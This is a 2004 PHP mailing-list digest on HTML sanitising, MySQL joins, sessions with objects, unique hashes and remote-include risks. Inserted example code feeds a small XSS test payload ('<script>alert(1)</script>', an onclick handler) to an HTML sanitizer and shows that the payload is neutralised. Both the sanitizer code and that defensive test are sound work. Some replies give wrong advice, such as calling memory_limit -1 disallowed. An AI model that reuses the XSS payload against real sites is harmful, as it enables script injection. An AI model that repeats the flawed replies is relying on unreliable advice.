[PHP] Re: Close all open tags in HTML text

2004-12-09 Thread Daniel Schierbeck
Matt Palermo wrote:
> I am allowing users to input HTML code into a textarea.  After they input 
> this, I want to output their HTML to the browser.  In order for the document 
> to be safe, I need to close all open HTML tags that have been left open by 
> the user, along with any open comments.  Is there a way to take an HTML 
> string and add closing tags and comments to it if needed?
>
> Thanks,
> Matt 

I would use a regular expression to grab the valid opening and closing 
HTML tags, and use something à la htmlentities() on the rest of the 
document.

--
Daniel Schierbeck
Help spread Firefox (www.getfirefox.com): 
http://www.spreadfirefox.com/?q=user/registerr=6584
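
One way to implement the approach suggested in this reply, as an added example that is not part of the original message: keep only bare tags from an allowlist, pass everything else (other tags, tags carrying attributes, comment openers) through htmlentities(), and close whatever is still open. It assumes PHP 7+; the tag lists and the function name clean_user_html() are hypothetical.

```php
<?php
// Added example, not code from the thread. Assumes PHP 7+.
// ALLOWED_TAGS / VOID_TAGS are hypothetical policy choices.
const ALLOWED_TAGS = ['b', 'i', 'em', 'strong', 'u', 'p', 'ul', 'ol', 'li',
                      'blockquote', 'code', 'pre'];
const VOID_TAGS = ['br', 'hr'];

function clean_user_html(string $input): string
{
    $names = implode('|', array_merge(ALLOWED_TAGS, VOID_TAGS));
    // A token counts as a tag only if it is a bare allowlisted tag with no
    // attributes; "<b onclick=...>" or "<script>" stay in the text tokens.
    $tokens = preg_split('~(</?(?:' . $names . ')\s*/?>)~i', $input, -1,
                         PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY);
    if ($tokens === false) {
        return htmlentities($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }

    $open = [];   // stack of currently open element names
    $out  = '';
    foreach ($tokens as $token) {
        if (!preg_match('~^<(/?)(' . $names . ')\s*/?>$~i', $token, $m)) {
            // Text, disallowed markup and "<!--" are rendered inert.
            $out .= htmlentities($token, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            continue;
        }
        $name = strtolower($m[2]);
        if (in_array($name, VOID_TAGS, true)) {
            if ($m[1] === '') {
                $out .= '<' . $name . '>';   // a stray "</br>" is dropped
            }
            continue;
        }
        if ($m[1] === '') {                  // opening tag
            $open[] = $name;
            $out .= '<' . $name . '>';
            continue;
        }
        // Closing tag: honour it only if that element is open, and close
        // anything opened after it first so the nesting stays valid.
        $positions = array_keys($open, $name, true);
        if ($positions === []) {
            continue;                        // nothing to close: drop it
        }
        $target = end($positions);
        while (count($open) > $target) {
            $out .= '</' . array_pop($open) . '>';
        }
    }
    while ($open !== []) {                   // close what the user left open
        $out .= '</' . array_pop($open) . '>';
    }
    return $out;
}

// Constructed sample input: mis-nested tags, a script element, an event
// handler attribute and an unterminated comment.
$sample = '<b>bold <i>both</b> tail <script>alert(1)</script> '
        . '<p onclick="x()">para <!-- never closed';
echo clean_user_html($sample), PHP_EOL;
```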

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[PHP] MYSQL Query question

2004-12-09 Thread Reinhart Viane
Table chat_online:
session (varchar)
activity (datetime)
 
Table persons
persons_region_int(int)
 
Table regions
region_id
region_name
 
On a page I list all persons which are in the chat_online dbase and
within a certain period:
$limit_time = time() - 130; // 2 Minutes time out. 60 * 2 = 120 
$sqlchatonline = "SELECT * FROM chat_online WHERE
UNIX_TIMESTAMP(activity) >= $limit_time AND
(sessionid!='".session_id()."')";
$resultchatonline = mysql_query($sqlchatonline) or die (mysql_error());
$chatvisits = mysql_num_rows($resultchatonline);
 
while ($rowchatonline = mysql_fetch_object($resultchatonline)) {
   $chattersessionid = $rowchatonline->sessionid;
   //get the username, userid, mainpicid from the online chatter
   $getinfo = "select * from persons where
person_session_id='$chattersessionid'";
   $resultgetinfo = mysql_query($getinfo) or die (mysql_error());
   $rowgetinfo = mysql_fetch_array($resultgetinfo);
   echo $rowgetinfo['person_nick'];
}
 
Now i want these online chatters to be listed by person_region_int:
something like:
region A
chatter1
chatter2
region B
none
region C
chatter3
chatter4
 
How do i do this?
 
And a second question:
I have created a menu box which lists all regions, if an option is
selected by the user, i only want to show the online chatters of the
selected region (selecting an option defines a variable $region which
holds the region_id)
Something like:
if ($region) {
$sqlchatonline = "SELECT * FROM chat_online, persons WHERE
UNIX_TIMESTAMP(chat_online.activity) >= $limit_time AND
(chat_online.sessionid!='".session_id()."') AND
(persons.persons_region_int='$region')";
}
 
This does not give me the correct result: it shows all online chatters *
total amount of users of that region. It should be all online chatters
from that specified region
 
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache when searching something. Does someone know a good
mysql manual site or a good mysql book?
 
Thx in advance
Reinhart
 
  _  

Reinhart Viane 
 mailto:[EMAIL PROTECTED] [EMAIL PROTECTED] 
Domos || D-Studio 
Graaf Van Egmontstraat 15/3 -- B 2800 Mechelen -- tel +32 15 44 89 01 --
fax +32 15 43 25 26 


STRICTLY PERSONAL AND CONFIDENTIAL 
This message may contain confidential and proprietary material for the
sole use of the intended 
recipient.  Any review or distribution by others is strictly prohibited.
If you are not the intended 
recipient please contact the sender and delete all copies.

 


Re: [PHP] ini_set doesn't work

2004-12-09 Thread Thomas Munz
you set it to '-1'!!!

that's not allowed. You must have a value higher than zero. It's better you set 
it in general to 60. And you forgot the 'M' after the number like

 ini_set("memory_limit","-1M");

set it better to that:
ini_set("memory_limit","60M");


> hello,
>
> what do I have to change in php.ini, to allow the
> ini_set("memory_limit","-1");
> command?
>
> It doesn't work in my script...
>
> regards
> Joerg




[PHP] Need shipping info

2004-12-09 Thread suneel
Hi guys...

Here I'm using a UPS service

Could any one tell what sort of details we have to consider in the 
database while shipping the products to the shipment gateway

thanks & regards,
Suneel

[PHP] PHP4 mysqli with mysql 4.1.7?

2004-12-09 Thread Francis Mak
Hi,

This message is a bit long, but I hope somebody could help me on this issue,
thank you .

I am using mysql 4.1.0(default-character-set=utf8) with PHP 4.3.3.  All
tables are using utf8 charset.
I can insert, select and display the utf8 character without any problem
using PHP, I used the normal mysql_query operation, NOT mysqli.  Yes,
mysql_query works well in 4.1.0.

Now, I upgraded to 4.1.7(default-character-set=utf8).  I use mysql client
and I can see all data in 4.1.7 are utf8.  However, PHP shows all as ???.
SHOW VARIABLES LIKE '%charset%'
character_set_server  utf8
character_set_system  utf8
character_set_database  utf8
character_set_client  utf8
character_set_connection utf8
character_set_results  utf8
collation_connection  utf8_general_ci
collation_database  utf8_general_ci
collation_server  utf8_general_ci

I struggled for a few days and finally discovered a message in mysql-lists
by Marek Lewczuk(UTF-8 problem, 24/5/2004), he has the following in his PHP
script:

mysqli_query($c, "SET CHARACTER SET utf8;");
mysqli_query($c, "SELECT * FROM db");

I have never used mysqli before, and I found it is only available in PHP5.

I have several questions to ask:

1. Can I compile PHP4 with mysqli extension?  Is there any tricks to do
this?
2. Why mysql 4.1 + mysqli is recommended?  But not the normal mysql
extension?
3. If I upgrade to mysql 4.1.7 + PHP5, I need to rewrite all of my
application to use mysqli instead of mysql?  Any advice on this issue?
4. I see that we must use mysqli_query($c, "SET CHARACTER SET utf8;");
before any query, can I compile the mysqli extension to use utf8 as default?
5. In http://www.php.net/manual/en/ref.mysql.php I see a note:  If you need
charsets other than latin (default), you have to install external (not
bundled) libmysql with compiled charset support.   So, it means it is
possible to use mysql_query to with utf8?
6. Any reason why I can use mysql_query with 4.1.0 without any problem?

I know there are many questions, but I hope somebody could help me.  And I
believe there are lots of people having the same upgrade issue.
if utf8 + 4.1.7 + mysqli_query is a must instead of 4.1.7 + mysql_query, I
am sure that there will be lots of problem come up as most PHP applications
are using mysql_query only.

THANK YOU VERY MUCH!!!

Francis Mak


[PHP] Objects and sessions

2004-12-09 Thread Francisco M. Marzoa Alonso
Following code:
<?php
class SessionTestC {
   protected $value;
   function __construct ( $val ) {
      $this->value = $val;
   }
   function GetValue () {
      return $this->value;
   }
}
if ( isset ($_SESSION['TestObj'])) {
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'<br>';
} else {
   session_start ();
   echo 'Session Test was not set.<br>';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "<a href='".basename($_SERVER['PHP_SELF'])."'>Click here.</a><br>";
}
?>
Gives me an error of incomplete object on second access, like this:
*Fatal error*: main() [function.main 
http://localhost/sfcms/Scripts/function.main]: The script tried to 
execute a method or access a property of an incomplete object. Please 
ensure that the class definition SessionTestC of the object you are 
trying to operate on was loaded _before_ unserialize() gets called or 
provide a __autoload() function to load the class definition in 
*/home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php* on line *16*

But as it can be seen, the class is defined in the script 
SessionTest.php itself, so... ??



[PHP] Re: mail with attachment

2004-12-09 Thread Dre
I did not try it yet .. but I will

Manuel Lemos [EMAIL PROTECTED] wrote in message
news:[EMAIL PROTECTED]
> Hello,
>
> Dre wrote:
> > Thanks Manuel, I will check the class
> >
> > and here is the code of the mail sending script
> > //==
> > <?php
> > $att_name = $_POST['att'];
> > echo $att_name;
> > $att_size = filesize($att_name);
> > $handle = fopen($att_name, "r");
> > $file = fread($handle, $att_size);
>
> You need to open the file as binary but I do not think that could cause
> the problem that you described. Did you try the class that I mentioned?
> Did it work?
>
> -- 
>
> Regards,
> Manuel Lemos
>
> PHP Classes - Free ready to use OOP components written in PHP
> http://www.phpclasses.org/
>
> PHP Reviews - Reviews of PHP books and other products
> http://www.phpclasses.org/reviews/
>
> Metastorage - Data object relational mapping layer generator
> http://www.meta-language.net/metastorage.html




Re: [PHP] Close all open tags in HTML text

2004-12-09 Thread Robin Vickery
On Wed, 8 Dec 2004 22:33:19 -0500, Matt Palermo [EMAIL PROTECTED] wrote:
> I am allowing users to input HTML code into a textarea.  After they input
> this, I want to output their HTML to the browser.  In order for the document
> to be safe, I need to close all open HTML tags that have been left open by
> the user, along with any open comments.  Is there a way to take an HTML
> string and add closing tags and comments to it if needed?

You might want to look at the html tidy functions for tidying and
repairing html:

   http://www.php.net/manual/en/ref.tidy.php

  -robin




[PHP] Question: urldecode

2004-12-09 Thread Stuart Felenstein
In my search page, the url returned comes back with
the ..err I forget what it's called, but query string
looks like this: %5B%5D=3.  I think the %5B and 5D
should be [].

What I think is needed is rawurldecode.  I've looked
through my code and think it belongs somewhere in this
block:

$queryString_rsVJ = "";
if (!empty($_SERVER['QUERY_STRING'])) {
  $params = explode("&", $_SERVER['QUERY_STRING']);
  $newParams = array();
  foreach ($params as $param) {
    if (stristr($param, "pageNum_rsVJ") == false && 
        stristr($param, "totalRows_rsVJ") == false) {
      array_push($newParams, $param);
    }
  }
  if (count($newParams) != 0) {
    $queryString_rsVJ = "&" .
      htmlentities(implode("&", $newParams));
  }
}

would doing something like this make sense?:

$queryString_rsVJ = "&" .
htmlentities(rawurldecode(implode("&", $newParams)));

Feedback appreciated.

Thank you 
Stuart




Re: [PHP] duplicate md5 hash's

2004-12-09 Thread Richard Davey
Hello Guy,

Thursday, December 9, 2004, 11:39:27 AM, you wrote:

GB> $hash = md5(uniqid($message));

GB> where message is a string that the user will input.

GB> How likely is it that this hash might be repeated?

GB> I'm using the hash as a primary key in a database - the user gets sent
GB> the hash as part of a url to retrieve the details of that database row.

GB> (it's a basic send to a friend e-card system).

GB> Is there any way that the same hash could have been generated more than
GB> once?

It's extremely unlikely (I cannot give you any stats as to how
unlikely though, sorry).

However why not just stick the $hash creation into a self-checking
loop. I.e. make the hash - check the database - does it exist already?
- If not then the hash is good, else repeat the process. Using uniqid
will give you a unique hash on each occasion so this process
shouldn't take very long at all even if it did find a duplicate a few
times (unlikely!)

Best regards,

Richard Davey
-- 
 http://www.launchcode.co.uk - PHP Development Services
 I am not young enough to know everything. - Oscar Wilde




[PHP] [SOLUTION] Re: [PHP] Objects and sessions

2004-12-09 Thread Francisco M. Marzoa Alonso
Thomas Munz wrote:
> I think, it's not possible to init an Object on a session. 

Yes, it can.
The problem was with serialization. With session.auto_start set to 1 on 
php.ini, seems like session's objects are unserialized before loading 
the script, so the class is not loaded when the session unserialized the 
object, and therefore it fails to unserialize it as an instance of its 
class.

Setting session.auto_start to 0 on php.ini you should take care of 
resume sessions calling session_start() each time, but you can put that 
call after class definition, so the object will be unserialized after, 
so the problem is solved.

This code works fine:
<?php
class SessionTestC {
   protected $value;
   function __construct ( $val ) {
      $this->value = $val;
   }
   function GetValue () {
      return $this->value;
   }
}
if ( isset ($_GET['close_session'])) {
   unset ($_SESSION);
   session_start ();
   session_destroy ();
}
session_start ();
if ( isset ($_SESSION['TestObj'])) {
   echo 'TestObj is an instance of '.get_class($_SESSION['TestObj']).'<br>';
   echo '<pre>';
   print_r ($_SESSION['TestObj']);
   echo '</pre>';

   echo "<a href='".basename($_SERVER['PHP_SELF'])."?close_session=1'>Close session.</a><br>";
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'<br>';
} else {
   echo 'Session Test was not set.<br>';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "<a href='".basename($_SERVER['PHP_SELF'])."'>Click here.</a><br>";
}

?>
BTW, I do not know if the code I've used to destroy the session is the 
best, but this is a secondary issue...



[PHP] allow_url_fopen ini directive not enough

2004-12-09 Thread Kelvin Jones
Hi,
I would like to see a new directive to go alongside allow_url_fopen to
allow people to turn on or off the ability to include/require a remote file.
The ability to include and execute a file as php from a remote host
leaves many applications open to cross-site-scripting attacks.
This would be easily avoidable if we had a directive
(allow_url_include?) that by default removed this capability.
Any thoughts?
Kelvin
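
A directive with the name proposed here, allow_url_include, was later added to PHP (5.2.0) and is off by default. The following added example, which is not part of the original message, shows the application-side counterpart: request data only selects a key from a fixed map, and the resolved file must lie inside one local directory. It assumes PHP 7+; the page keys, file names and function names are hypothetical.

```php
<?php
// Added example, not code from the thread. Assumes PHP 7+.
// The page keys, file names and the throwaway directory are hypothetical.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested, string $baseDir): string
{
    // Request data only selects a key; it never becomes part of the path.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        $requested = 'home';
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // realpath() resolves symlinks and "..", so a prefix check is meaningful.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('page file missing or outside ' . $baseDir);
    }
    return $path;
}

function remote_include_enabled(): bool
{
    // Deployment check: include/require of URLs should be switched off.
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed demo: build a throwaway directory holding the three pages,
// then resolve a valid key and a URL-shaped value.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($dir);
foreach (PAGES as $file) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $file, "<?php echo 'ok';\n");
}
var_dump(remote_include_enabled());
echo basename(resolve_page('about', $dir)), PHP_EOL;
echo basename(resolve_page('http://example.invalid/x.txt', $dir)), PHP_EOL;
```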


[PHP] duplicate md5 hash's

2004-12-09 Thread Guy Bowden
Hi,
I know this is highly unlikely... but I have this code:
$hash = md5(uniqid($message));
where message is a string that the user will input.
How likely is it that this hash might be repeated?
I'm using the hash as a primary key in a database - the user gets sent 
the hash as part of a url to retrieve the details of that database row.

(it's a basic send to a friend e-card system).
Is there any way that the same hash could have been generated more than 
once?

Cheers,
Guy


Re: [PHP] duplicate md5 hash's

2004-12-09 Thread Guy Bowden
Thanks for the tip... I have now implemented a while loop to make sure 
that it goes into the db, as you say this should never actually loop, 
but if it does it should only loop once..

kind of extra security..
cheers
Richard Davey wrote:
> Hello Guy,
>
> Thursday, December 9, 2004, 11:39:27 AM, you wrote:
>
> GB> $hash = md5(uniqid($message));
> GB> where message is a string that the user will input.
> GB> How likely is it that this hash might be repeated?
> GB> I'm using the hash as a primary key in a database - the user gets sent
> GB> the hash as part of a url to retrieve the details of that database row.
> GB> (it's a basic send to a friend e-card system).
> GB> Is there any way that the same hash could have been generated more than
> GB> once?
>
> It's extremely unlikely (I cannot give you any stats as to how
> unlikely though, sorry).
>
> However why not just stick the $hash creation into a self-checking
> loop. I.e. make the hash - check the database - does it exist already?
> - If not then the hash is good, else repeat the process. Using uniqid
> will give you a unique hash on each occasion so this process
> shouldn't take very long at all even if it did find a duplicate a few
> times (unlikely!)
>
> Best regards,
> Richard Davey


Re: [PHP] Objects and sessions

2004-12-09 Thread Thomas Munz
I think, it's not possible to init an Object on a session. Session will be 
rebuilt on each reload of the site based on the session id, I think...

Maybe here the object can't be rebuilt anymore...

> Following code:
>
> <?php
>
> class SessionTestC {
>    protected $value;
>
>    function __construct ( $val ) {
>       $this->value = $val;
>    }
>
>    function GetValue () {
>       return $this->value;
>    }
> }
>
> if ( isset ($_SESSION['TestObj'])) {
>    echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'<br>';
> } else {
>    session_start ();
>    echo 'Session Test was not set.<br>';
>    $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
>    echo "<a href='".basename($_SERVER['PHP_SELF'])."'>Click here.</a><br>";
> }
>
> ?>
>
> Gives me an error of incomplete object on second access, like this:
>
> *Fatal error*: main() [function.main
> http://localhost/sfcms/Scripts/function.main]: The script tried to
> execute a method or access a property of an incomplete object. Please
> ensure that the class definition SessionTestC of the object you are
> trying to operate on was loaded _before_ unserialize() gets called or
> provide a __autoload() function to load the class definition in
> */home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php* on line *16*
>
> But as it can be seen, the class is defined in the script
> SessionTest.php itself, so... ??




[PHP] best practice question..

2004-12-09 Thread Guy Bowden
On this note - what is considered best practice in a - sent to friend 
type thing.

i.e. User inputs their name + message + email + friends email into a 
html/flash form

friend gets a link to read the message.
currently I do this:
1 collect form input
2 create hash using the md5/uniqid method : $hash = md5(uniqid($key));
3 input data to database table using the hash as the primary key value
4 send email to friend with link containing the hash
5 user clicks on link
6 hash read in from the $_GET object
7 hash used to select message details from DB and displayed to the user
There's never a security issue here - i.e. i don't mind how many times / 
who reads the message, but just want to make it hard to just guess keys 
to read other messages (otherwise it would just be the db id)

This method works for me, but is it the *right* way?
Thanks for any input
Cheers,
Guy


Re: [PHP] Need shipping info

2004-12-09 Thread John Nichel
suneel wrote:
> Hi guys...
> Here I'm using a UPS service
> Could any one tell what sort of details we have to consider in the database 
> while shipping the products to the shipment gateway
>
> thanks & regards,
> Suneel

You might want to consider asking a php question.
<muttering>
adds UPS to the list of things covered by the php-general list
</muttering>
--
By-Tor.com
...it's all about the Rush
http://www.by-tor.com


Re: [PHP] best practice question..

2004-12-09 Thread Richard Davey
Hello Guy,

Thursday, December 9, 2004, 12:34:03 PM, you wrote:

GB> There's never a security issue here - i.e. i don't mind how many times /
GB> who reads the message, but just want to make it hard to just guess keys
GB> to read other messages (otherwise it would just be the db id)

GB> This method works for me, but is it the *right* way?

There's no right or wrong way to do this - if it works for you, then
it works :)

The only thing I would strongly suggest is a check somewhere - if the
recipient has been sent an email already (perhaps within the last 30
days?) then you don't send them another one.

That way you're not open to being a spam bot.

Best regards,

Richard Davey
-- 
 http://www.launchcode.co.uk - PHP Development Services
 I am not young enough to know everything. - Oscar Wilde
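
The numbered procedure in this thread and the self-checking loop from the "duplicate md5 hash's" thread, as one added example that is not part of the original messages. Because uniqid() is derived from the current time, this sketch swaps in random_bytes() for the key so that it is hard to guess, and lets the primary key constraint do the duplicate check inside the insert itself. It assumes PHP 7+ with pdo_sqlite; the ecards table, its columns and the function names are hypothetical.

```php
<?php
// Added example, not code from the thread. Assumes PHP 7+ with pdo_sqlite;
// the ecards table and its columns are hypothetical.

function new_token(): string
{
    // 16 bytes from the OS CSPRNG, hex-encoded to 32 characters.
    return bin2hex(random_bytes(16));
}

function store_card(PDO $db, string $sender, string $message, int $maxTries = 3): string
{
    $insert = $db->prepare(
        'INSERT INTO ecards (token, sender, message) VALUES (?, ?, ?)'
    );
    for ($try = 0; $try < $maxTries; $try++) {
        $token = new_token();
        try {
            // The PRIMARY KEY makes "check, then insert" a single atomic step.
            $insert->execute([$token, $sender, $message]);
            return $token;
        } catch (PDOException $e) {
            // SQLSTATE class 23 = integrity constraint violation, i.e. the
            // key already exists; anything else is a real error.
            if (strncmp((string) $e->getCode(), '23', 2) !== 0) {
                throw $e;
            }
        }
    }
    throw new RuntimeException('no unused token after ' . $maxTries . ' tries');
}

function fetch_card(PDO $db, $token): ?array
{
    // Step 6 of the list: the value arrives via $_GET, so check its shape
    // before it goes anywhere near the database.
    if (!is_string($token) || !preg_match('/\A[0-9a-f]{32}\z/', $token)) {
        return null;
    }
    $select = $db->prepare('SELECT sender, message FROM ecards WHERE token = ?');
    $select->execute([$token]);
    $row = $select->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo against an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ecards (token CHAR(32) PRIMARY KEY, sender TEXT, message TEXT)');

$token = store_card($db, 'Guy', 'Happy birthday!');
var_dump(strlen($token));
var_dump(fetch_card($db, $token));
var_dump(fetch_card($db, '1'));                  // wrong shape
var_dump(fetch_card($db, str_repeat('0', 32)));  // right shape, unknown key
```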




RE: [PHP] Question: urldecode

2004-12-09 Thread Ford, Mike
To view the terms under which this email is distributed, please go to 
http://disclaimer.leedsmet.ac.uk/email.htm



> -----Original Message-----
> From: Stuart Felenstein [mailto:[EMAIL PROTECTED] 
> Sent: 09 December 2004 11:52
> 
> In my search page, the url returned comes back with
> the ..err I forget what it's called, but query string
> looks like this: %5B%5D=3.  I think the %5B and 5D
> should be [].

Are you seeing the URL-encoded version *only* in your browser's
Address/Location bar?  If so, that's perfectly normal and nothing to worry
about -- it should be automatically decoded by the Web server before being
passed to PHP.

If you're seeing the encoded version actually in your PHP script, that
sounds like a major problem, possibly indicating a missing urldecode() or
extraneous urlencode() -- in which case, please post a more detailed
analysis of your problem, examples of the unwanted behaviour, and the
relevant portions of script.

Cheers!

Mike

-
Mike Ford,  Electronic Information Services Adviser,
Learning Support Services, Learning  Information Services, JG125, James
Graham Building, Leeds Metropolitan University, Headingley Campus, LEEDS,
LS6 3QS,  United Kingdom
Email: [EMAIL PROTECTED]
Tel: +44 113 283 2600 extn 4730  Fax:  +44 113 283 3211




Re: [PHP] MYSQL Query question

2004-12-09 Thread Raditha Dissanayake
Reinhart Viane wrote:

> And a last question:
> I always seem to get stuck on mysql queries when scripting. mysql.com
> gives me a headache when searching something. Does someone know a good
> mysql manual site or a good mysql book?

That does not mean mysql questions should be posted on php mailing lists.

> STRICTLY PERSONAL AND CONFIDENTIAL 
> This message may contain confidential and proprietary material for the
> sole use of the intended 
> recipient.  Any review or distribution by others is strictly prohibited.
> If you are not the intended 
> recipient please contact the sender and delete all copies.

Do you know that mailing lists are automatically archived at thousands 
of websites?


--
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 



RE: [PHP] MYSQL Query question

2004-12-09 Thread Reinhart Viane
First, since it was a combined question of php and mysql I thought of
sending it here.
Secondly, this is my standard footer.

My apologies if my question irritates you


-----Original Message-----
From: Raditha Dissanayake [mailto:[EMAIL PROTECTED] 
Sent: donderdag 9 december 2004 14:14
To: [EMAIL PROTECTED]
Subject: Re: [PHP] MYSQL Query question


Reinhart Viane wrote:

And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com 
gives me a headache when searching something. Does someone know a good 
mysql manual site or a good mysql book?
  

That does not mean mysql questions should be posted on php mailing
lists.

 


STRICTLY PERSONAL AND CONFIDENTIAL
This message may contain confidential and proprietary material for the
sole use of the intended 
recipient.  Any review or distribution by others is strictly
prohibited.
If you are not the intended 
recipient please contact the sender and delete all copies.
  

Do you know that mailing lists are automatically archived at thousands 
of websites?

 

  



-- 
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 




RE: [PHP] Question: urldecode

2004-12-09 Thread Stuart Felenstein

--- Ford, Mike [EMAIL PROTECTED] wrote:

> Are you seeing the URL-encoded version *only* in
> your browser's
> Address/Location bar?  If so, that's perfectly
> normal and nothing to worry
> about -- it should be automatically decoded by the
> Web server before being
> passed to PHP.
>
> If you're seeing the encoded version actually in
> your PHP script, that
> sounds like a major problem, possibly indicating a
> missing urldecode() or
> extraneous urlencode() -- in which case, please post
> a more detailed
> analysis of your problem, examples of the unwanted
> behaviour, and the
> relevant portions of script.

I have no idea about what it means to see the encoded
version in my script. I have only one urldecode in the
script:

<a href="SearchJobDetails.php?JobID=<?php echo
urldecode($row_rsVJ['JobID']);?>">

No urlencodes anywhere. 
I'll assume it's decoded properly before going to php
because the script runs fine.  I just know that I've
seen the hex's normally converted in the browser bar.

Further, I was assuming I should add the urldecode to
the query string.  As I had posted originally.  From
the example in the manual it appears I might to pass
the params through a urldecode counter loop.  

Lastly, I wasn't concerned about the hex code, but I
just made some reconnections of scripts.  Users can
save their search parameters.  I am saving the query
string.  Now I had this set up before and the way it
was working , is when the user wanted to view or
edit their saved searches, the search page would come
back with all the parameters filled in including
shaded parameters in things like mult select lists and
menu dropdowns.  It's not working that way now , so my
first suspicion is perhaps the hex is affecting it.

I can post more of the script if that makes sense.

Stuart




[PHP] Re: Objects and sessions

2004-12-09 Thread Shen Kong
Hi, your code may be this, you must use session_start() first:
<?php
session_start ();
class SessionTestC {
   protected $value;
   function __construct ( $val ) {
      $this->value = $val;
   }
   function GetValue () {
      return $this->value;
   }
}
if ( isset ($_SESSION['TestObj'])) {
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'<br>';
} else {
   echo 'Session Test was not set.<br>';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "<a href='".basename($_SERVER['PHP_SELF'])."'>Click here.</a><br>";
}
?>

Francisco M. Marzoa Alonso wrote:
> Following code:
> <?php
> class SessionTestC {
>    protected $value;
>    function __construct ( $val ) {
>       $this->value = $val;
>    }
>    function GetValue () {
>       return $this->value;
>    }
> }
> if ( isset ($_SESSION['TestObj'])) {
>    echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'<br>';
> } else {
>    session_start ();
>    echo 'Session Test was not set.<br>';
>    $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
>    echo "<a href='".basename($_SERVER['PHP_SELF'])."'>Click here.</a><br>";
> }
> ?>
> Gives me an error of incomplete object on second access, like this:
> *Fatal error*: main() [function.main 
> http://localhost/sfcms/Scripts/function.main]: The script tried to 
> execute a method or access a property of an incomplete object. Please 
> ensure that the class definition SessionTestC of the object you are 
> trying to operate on was loaded _before_ unserialize() gets called or 
> provide a __autoload() function to load the class definition in 
> */home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php* on line *16*
>
> But as it can be seen, the class is defined in the script 
> SessionTest.php itself, so... ??

--
-- ShenKong ([EMAIL PROTECTED])
-- http://www.openphp.cn


[PHP] a question about the PHP manual

2004-12-09 Thread Eakin, W
Hello,
   As I'm studying, and learning, PHP, I use certain resources again 
and again. A few books I've bought, some web sites, this mailing list, 
and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I 
attempt to google or RTFM before considering a post to the list with a 
question, but now I have a question about the manual itself.
I've noticed that most of the replies to the questions on this list, 
when they refer to a part of the manual,  point to the same few sections 
over and over. Such as arrays, strings, sessions, objects, and a few others.
My question is this, when I'm reading the manual, is it just that I should 
be concentrating on a few sections (and if so, which?), or should I be 
giving equal attention to all the sections, including some (I suppose) I 
might never use.

Thoughts?
thanks,
William


[PHP] Re: Installing Apache and PHP from scratch

2004-12-09 Thread Don
> > Hi,
> >
> > Have been using RedHat and Fedora Systems.  When I install the OS, Apache is
> > usually installed already and I download PHP and install manually.  I'd like
> > to install Apache itself but not sure what configuration to use.  Is there
> > a command similar to the phpinfo() command that can tell me how an already
> > installed Apache is configured?
>
> Enable server-info in your httpd.conf and be amazed at the amount of
> information http://localhost/server-info will chuck at you.

How exactly does this work?

1. In my httpd.conf file I uncommented the following lines:
<Location /server-info>
SetHandler server-info
Order deny,allow
Deny from all
Allow from .lclnav.com
</Location>

2.  I then restarted my apache server

3.  I then type in the location bar:
http://www.lclnav.com/server-info

I get (doesn't work):

Forbidden
You don't have permission to access /server-info on this server.

Note: I created the directory 'server-info' off of the directory root after
the error; still errors




RE: [PHP] Question: urldecode

2004-12-09 Thread Ford, Mike
To view the terms under which this email is distributed, please go to 
http://disclaimer.leedsmet.ac.uk/email.htm



> -----Original Message-----
> From: Stuart Felenstein [mailto:[EMAIL PROTECTED] 
> Sent: 09 December 2004 13:38
> 
> --- Ford, Mike [EMAIL PROTECTED] wrote:
> 
> > Are you seeing the URL-encoded version *only* in
> > your browser's
> > Address/Location bar?  If so, that's perfectly
> > normal and nothing to worry
> > about -- it should be automatically decoded by the
> > Web server before being
> > passed to PHP.
> >
> > If you're seeing the encoded version actually in
> > your PHP script, that
> > sounds like a major problem, possibly indicating a
> > missing urldecode() or
> > extraneous urlencode() -- in which case, please post
> > a more detailed
> > analysis of your problem, examples of the unwanted
> > behaviour, and the
> > relevant portions of script.
> 
> I have no idea about what it means to see the encoded
> version in my script. I have only one urldecode in the
> script:
> 
> <a href="SearchJobDetails.php?JobID=<?php echo 
> urldecode($row_rsVJ['JobID']);?>">

I actually doubt whether you even need this urldecode() -- but it depends
where that value is coming from.

> Further, I was assuming I should add the urldecode to
> the query string.

I don't quite understand this -- if you mean the query string supplied to
your script and manifesting in your $_GET array, then no, very unlikely,
since this should have been taken care of by the Web server before it gets
